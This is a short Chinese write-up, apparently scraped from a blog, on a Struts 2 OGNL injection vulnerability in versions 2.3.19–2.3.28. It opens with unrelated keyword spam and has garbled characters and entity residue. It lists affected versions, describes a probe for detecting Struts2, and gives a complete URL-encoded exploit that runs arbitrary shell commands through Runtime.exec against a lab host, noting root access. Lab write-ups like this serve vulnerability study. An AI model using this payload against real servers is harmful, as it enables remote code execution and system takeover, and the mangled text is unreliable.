外国做袜子的网站,软件开发技术流程图,phpcms v9做网站,公司建网站 内部邮箱影响范围
Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28
当用户提交表单数据并验证失败时#xff0c;后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析#xff0c;然后重新填充到对应的表单数据中。
漏洞搭建
没有特殊要求#xff0c;请看 (3…影响范围
Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28
当用户提交表单数据并验证失败时后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析然后重新填充到对应的表单数据中。
漏洞搭建
没有特殊要求请看 (3条消息) vulhub搭建方法_himobrinehacken的博客-CSDN博客 判断方式
检测 根目录参数?actionErrors1111
如果返回的页面出现异常则可以认定为目标是基于 Struts2 构建的。异常包括但不限于以下几种现象
1、 页面直接出现 404 或者 500 等错误。
2、 页面上输出了与业务有关错误消息或者 1111 被回显到了页面上。
3、 页面的内容结构发生了明显的改变。
4、 页面发生了重定向。
漏洞利用 exp
http://192.168.21.182:8080/memoindex.action?
method:%23_memberAccess%3dognl.OgnlContextDEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setC
haracterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnewjava.util.Scanner(java.lang.RuntimegetRuntime().exec(%23pa
rameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23
w.print(%23str),%23w.close(),1?%23xx:%23request.toStringpp%5C%5CAppp%20encodingUTF-8cmdls 注意执行whoami时是root用户
